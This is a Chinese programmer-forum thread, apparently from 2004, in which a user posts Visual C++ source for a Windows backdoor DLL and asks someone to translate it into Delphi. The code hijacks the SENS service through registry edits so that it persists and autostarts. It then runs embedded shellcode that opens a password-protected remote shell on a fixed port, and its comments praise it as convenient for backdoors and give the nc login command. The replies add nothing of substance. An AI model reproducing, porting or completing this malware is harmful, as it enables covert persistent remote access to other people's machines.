各位大虾请了,有谁能把这段VC的代码翻译成DELPHI,本人放分200感激不尽。。。。
请各位高手帮忙啊。。。。。。
#include <stdio.h>
#include <windows.h>
#include "win32sc.h" //天行的头文件
#pragma comment(lib,"ws2_32")
#define DEFAULT_SERVICE "SENS" //默认修改的服务,注意:被安装后原sens服务将失效!
void __stdcall ServiceMain( int argc, wchar_t* argv[] );
int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress );
void __stdcall ServiceHandler( DWORD dwCommand );
int RealService();
int InstallService();
int Remove();
HANDLE hDll = NULL;
SERVICE_STATUS_HANDLE hSrv;
DWORD dwCurrState;
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
hDll = hModule;
break;
}
return TRUE;
}
void __stdcall ServiceMain( int argc, wchar_t* argv[] )
{
char svcname[256], file[MAX_PATH];
strncpy(svcname, (char*)argv[0], sizeof svcname);
wcstombs(svcname, argv[0], sizeof svcname);
hSrv = RegisterServiceCtrlHandler( svcname, (LPHANDLER_FUNCTION)ServiceHandler );
if( hSrv == NULL )
{
return;
}else FreeConsole();
TellSCM( SERVICE_START_PENDING, 0, 1 );
TellSCM( SERVICE_RUNNING, 0, 0 );
int bInteract = argc > 2 ? 1 : 0;
if(argc > 1)
strncpy(file, (char*)argv[1], sizeof file),
wcstombs(file, argv[1], sizeof file);
RealService();
do{
Sleep(10);
}while(dwCurrState != SERVICE_STOP_PENDING && dwCurrState != SERVICE_STOPPED);
return;
}
int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress )
{
SERVICE_STATUS srvStatus;
srvStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
srvStatus.dwCurrentState = dwCurrState = dwState;
srvStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_SHUTDOWN;
srvStatus.dwWin32ExitCode = dwExitCode;
srvStatus.dwServiceSpecificExitCode = 0;
srvStatus.dwCheckPoint = dwProgress;
srvStatus.dwWaitHint = 3000;
return SetServiceStatus( hSrv, &srvStatus );
}
void __stdcall ServiceHandler( DWORD dwCommand )
{
switch( dwCommand )
{
case SERVICE_CONTROL_STOP:
TellSCM( SERVICE_STOP_PENDING, 0, 1 );
Sleep(10);
TellSCM( SERVICE_STOPPED, 0, 0 );
break;
case SERVICE_CONTROL_PAUSE:
TellSCM( SERVICE_PAUSE_PENDING, 0, 1 );
TellSCM( SERVICE_PAUSED, 0, 0 );
break;
case SERVICE_CONTROL_CONTINUE:
TellSCM( SERVICE_CONTINUE_PENDING, 0, 1 );
TellSCM( SERVICE_RUNNING, 0, 0 );
break;
case SERVICE_CONTROL_INTERROGATE:
TellSCM( dwCurrState, 0, 0 );
break;
case SERVICE_CONTROL_SHUTDOWN:
TellSCM( SERVICE_STOPPED, 0, 0 );
break;
}
}
int RealService()
{
//以下是调用天行的头文件的shellcode
//我觉得这代码开后门很方便,减小了zxsvc.dll的体积,而且有密码验证,但是每次的命令都要敲两次回车
SH_WORKEXIT(0);
SH_WORKMODE(SH_WORKMODE_REUSE);
SH_WORKHOST(inet_addr("0"));
SH_WORKPORT(567); //500是后门端口,可自行更改
SH_PEEKHOST(inet_addr("0"));
SH_PEEKPORT(781021); //168是验证密码,必须是数字
SH_WORKOPTION(0);
((void (*)(void)) &ShellCode)();
return 0;
// 用nc.exe登陆!格式: nc -p 5201314 127.0.0.1 500
}
int InstallService()
{
int rc = 0;
HKEY hkRoot = HKEY_LOCAL_MACHINE, hkParam = 0;
SC_HANDLE hscm = NULL, schService = NULL;
try
{
char buff[500];
char *svcname = DEFAULT_SERVICE;
char *lpHostName;
DWORD dwErrorCode;
lpHostName=NULL;
hkRoot = HKEY_LOCAL_MACHINE;
strncpy(buff, "SYSTEM\\CurrentControlSet\\Services\\", sizeof buff);
strncat(buff, svcname, 100);
rc = RegOpenKeyEx(hkRoot, buff, 0, KEY_ALL_ACCESS, &hkRoot);
rc = RegCreateKey(hkRoot, "Parameters", &hkParam);
SetLastError(rc);
!GetModuleFileName(HMODULE(hDll), buff, sizeof buff);
rc = 2;
rc = RegSetValueEx(hkRoot, "Start", 0, REG_DWORD, (unsigned char*)&rc, sizeof rc);
rc = RegSetValueEx(hkParam, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)buff, strlen(buff)+1);
SetLastError(rc);
rc = 0;
}catch(char *str)
{
if(str && str[0])
{
rc = GetLastError();
}
}
RegCloseKey(hkRoot);
RegCloseKey(hkParam);
return rc;
}
void Install()
{
InstallService();
RealService();
}
int Remove()
{
char *svcname = DEFAULT_SERVICE;
int rc = 0;
char buff[500];
HKEY hkRoot = HKEY_LOCAL_MACHINE, hkParam = 0;
hkRoot = HKEY_LOCAL_MACHINE;
strncpy(buff, "SYSTEM\\CurrentControlSet\\Services\\", sizeof buff);
strncat(buff, svcname, 100);
rc = RegOpenKeyEx(hkRoot, buff, 0, KEY_ALL_ACCESS, &hkRoot);
rc = RegCreateKey(hkRoot, "Parameters", &hkParam);
SetLastError(rc);
!GetModuleFileName(HMODULE(hDll), buff, sizeof buff);
rc = RegSetValueEx(hkParam, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)"%SystemRoot%\\system32\\sens.dll", 100); //"%SystemRoot%\\system32\\sens.dll"是服务SENS的默认dll指向地址,随DEFAULT_SERVICE name的改变自行更改
return rc;
}
代码不是很长,把主要语句的翻译一下就可以了!!!!!谢谢!
问题点数:100、回复次数:2Top
1 楼zwb666(zwb)回复于 2004-12-04 17:12:58 得分 50
学习Top
2 楼rouqing(*冰雨&双子座奇缘*)回复于 2004-12-04 17:53:09 得分 50
int Remove()操作注册表的应该看的懂吧
你再看看SERVICE_STATUS的结构(记录)Top
相关问题
- 渴求网上购物系统代码,感激不尽,50分
- 请问谁能提供一下MD5的算法的代码啊,要求非VC的C++版本(即Unix下的),感激不尽,100分哦^_^
- 谁有比较好一点的聊天室源代码? 感激不尽......
- 哪位大侠有ration rose的delphi插件提供,小弟感激不尽
- 安装vc碰到一个问题,请各位来看看!感激不尽
- 关于VFP6.0中登录界面代码问题,各位大哥救救小弟啊!!!!!!!!!!!感激不尽!!!!!!!!1
- 求救!如何用VB做200卡电话拔号充值??(最好附上源代码,小弟感激不尽!)
- 100分求连接oracle数据库的自写分页代码或算法,感激不尽!
- 谁可以给出waveInOpen及其相关API函数的Delphi范例,感激不尽
- VC中创建线程的语句编译不通过,那位高手予以指导,感激不尽
